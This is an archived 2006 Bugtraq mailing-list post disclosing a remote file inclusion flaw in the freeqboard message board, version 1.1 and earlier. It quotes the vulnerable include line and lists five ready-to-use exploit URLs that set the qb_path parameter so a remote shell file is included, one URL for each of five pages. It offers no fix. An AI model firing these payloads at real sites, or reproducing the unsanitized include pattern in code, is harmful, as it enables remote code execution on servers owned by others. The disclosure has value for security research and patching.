[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY20-F1544BCFFE14556F8021F35ECDA0@phx.gbl>
Date: Fri, 01 Dec 2006 11:32:26 +0300
From: "-= SHELL =- -= SHELL =-" <she1l@...mail.com>
To: bugtraq@...urityfocus.com
Cc: submit@...w0rm.com
Subject: freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability
##################################################
#
#
# freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability
#
#
#
# Author: Mr.3FReeT
#
#
#
# Softname: freeqboard
#
#
#
##################################################
#
# code in :
# about.php , contact.php , delete.php , faq.php , index.php
#
# include "config.php";
# include $qb_path."incs/mysql.php";
#
##################################################
#
# Exploit :
# """"""""
#
# www.site.com/[path]/index.php?qb_path=shellcode.txt?
#
# www.site.com/[path]/faq.php?qb_path=shellcode.txt?
#
# www.site.com/[path]/delete.php?qb_path=shellcode.txt?
#
# www.site.com/[path]/contact.php?qb_path=shellcode.txt?
#
# www.site.com/[path]/about.php?qb_path=shellcode.txt?
#
##################################################
#
# GreeTz: [ Dr.2 ] , [ ToOoFa ] , [ General C ] , [ asbmay ] , [ q8i^rock ]
, [ SHiKaA ] & KuW SeC TeaM
#
##################################################
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Powered by blists - more mailing lists